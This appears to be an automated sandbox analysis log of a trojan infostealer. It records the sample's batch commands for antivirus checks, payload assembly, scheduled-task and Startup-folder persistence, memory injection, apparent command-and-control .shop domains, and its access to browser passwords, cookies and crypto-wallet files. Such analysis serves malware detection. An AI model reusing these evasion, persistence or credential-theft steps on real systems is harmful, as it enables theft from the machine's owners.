Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA087
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_004EA1E2
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 18_2_004EA570
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004AC622 FindFirstFileExW, 18_2_004AC622
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E66DC FindFirstFileW,FindNextFileW,FindClose, 18_2_004E66DC
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E7333 FindFirstFileW,FindClose, 18_2_004E7333
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 18_2_004E73D4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DD921
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_004DDC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 26_2_0046A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 26_2_0045E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 26_2_0046A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0042C622 FindFirstFileExW, 26_2_0042C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004666DC FindFirstFileW,FindNextFileW,FindClose, 26_2_004666DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00467333 FindFirstFileW,FindClose, 26_2_00467333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 26_2_004673D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045D921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0045DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 26_2_0045DC54
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00475FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 18_2_00475FC8
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: Buffer.pif, 0000001A.00000002.2160485981.0000000001738000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160598329.0000000001771000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160598329.0000000001771000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0163B430 LdrInitializeThunk, 26_2_0163B430
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EF4FF BlockInput, 18_2_004EF4FF
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0047338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 18_2_0047338B
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00475FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 18_2_00475FC8
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00495058 mov eax, dword ptr fs:[00000030h] 18_2_00495058
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00415058 mov eax, dword ptr fs:[00000030h] 26_2_00415058
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 18_2_004D20AA
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004A2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_004A2992
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00490BAF
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490D45 SetUnhandledExceptionFilter, 18_2_00490D45
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00490F91
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00422992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00422992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00410BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410D45 SetUnhandledExceptionFilter, 26_2_00410D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00410F91

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif base: 1600000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif base: 230000 value starts with: 4D5A
Source: Buffer.pif String found in binary or memory: acceptabledcooeprs.shop
Source: Buffer.pif String found in binary or memory: zippyfinickysofwps.shop
Source: Buffer.pif String found in binary or memory: obsceneclassyjuwks.shop
Source: Buffer.pif String found in binary or memory: boredimperissvieos.shop
Source: Buffer.pif String found in binary or memory: plaintediousidowsko.shop
Source: Buffer.pif String found in binary or memory: miniaturefinerninewjs.shop
Source: Buffer.pif String found in binary or memory: holicisticscrarws.shop
Source: Buffer.pif String found in binary or memory: sweetsquarediaslw.shop
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 18_2_004D1B4D
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0047338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 18_2_0047338B
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DBBED SendInput,keybd_event, 18_2_004DBBED
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DEC6C mouse_event, 18_2_004DEC6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MasBathroomsCompoundInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif 1181\Buffer.pif 1181\Y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif" "C:\Users\user\AppData\Local\EdTech Spark Solutions\w"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\eduspark.url" & echo url="c:\users\user\appdata\local\edtech spark solutions\eduspark.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\eduspark.url" & exit
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 18_2_004D14AE
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004D1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 18_2_004D1FB0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1601599009.0000000002923000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004669000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000000.1641557735.00000000004B3000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EduSpark.pif, Buffer.pif Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490A08 cpuid 18_2_00490A08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004CE5F4 GetLocalTime, 18_2_004CE5F4
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004CE652 GetUserNameW, 18_2_004CE652
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004ABCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 18_2_004ABCD2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040348F
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Buffer.pif, 0000001A.00000003.2132311001.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2132514901.00000000017F0000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159513394.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160675221.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2132311001.00000000017BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: Buffer.pif PID: 2004, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "ez": "Jaxx Liberty"
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "ez": "ExodusWeb3"
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Ethereum",
Source: Buffer.pif, 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Buffer.pif, 0000001A.00000003.2038452665.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "keystore"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
